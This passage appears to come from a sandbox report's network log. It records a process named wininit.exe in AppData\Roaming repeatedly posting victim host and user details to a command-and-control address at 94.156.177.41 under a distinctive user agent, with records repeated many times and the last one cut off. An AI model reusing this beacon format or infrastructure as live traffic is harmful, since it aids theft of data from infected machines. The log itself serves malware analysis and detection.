                                                    Nov 20, 2024 11:09:01.972569942 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:02.711323977 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:02 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    50192.168.2.224921394.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:02.856967926 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:02.864900112 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:03.596916914 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:03 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    51192.168.2.224921494.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:03.744118929 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:03.749037981 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:04.474706888 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:04 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    52192.168.2.224921594.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:04.616421938 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:04.621438026 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:05.407283068 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:05 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    53192.168.2.224921694.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:05.550718069 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:05.555632114 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:06.303242922 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:06 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    54192.168.2.224921794.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:06.500703096 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:06.505714893 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:07.233683109 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:07 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    55192.168.2.224921894.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:07.381669044 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:07.388226986 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:08.137691975 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:08 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    56192.168.2.224921994.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:08.623548985 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:08.631913900 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:09.364536047 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:09 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    57192.168.2.224922094.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:09.502470970 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:09.510262966 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:10.234821081 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:10 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    58192.168.2.224922194.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:10.376441002 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:10.381525993 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:11.115159988 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:11 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    59192.168.2.224922294.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:11.264699936 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:11.269627094 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:12.012393951 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:11 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    60192.168.2.224922394.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:12.149975061 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:12.154908895 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:12.941234112 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:12 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    61192.168.2.224922494.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:13.111741066 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:13.118072033 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:13.866027117 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:13 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    62192.168.2.224922594.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:14.012284040 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:14.021635056 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:14.783304930 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:14 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    63192.168.2.224922694.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:15.048830986 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:15.054347038 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:15.785959005 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:15 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    64192.168.2.224922794.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:15.949862003 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:15.957636118 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:16.809887886 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:16 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    65192.168.2.224922894.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:16.968250036 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:16.974548101 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:17.701922894 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:17 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    66192.168.2.224922994.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:17.850151062 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:17.855870008 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:19.526344061 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:18 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.
                                                    Nov 20, 2024 11:09:19.526712894 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:18 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.
                                                    Nov 20, 2024 11:09:19.527072906 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:18 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    67192.168.2.224923094.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:19.676456928 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:19.681406021 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:20.420433044 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:20 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    68192.168.2.224923194.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:20.566973925 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
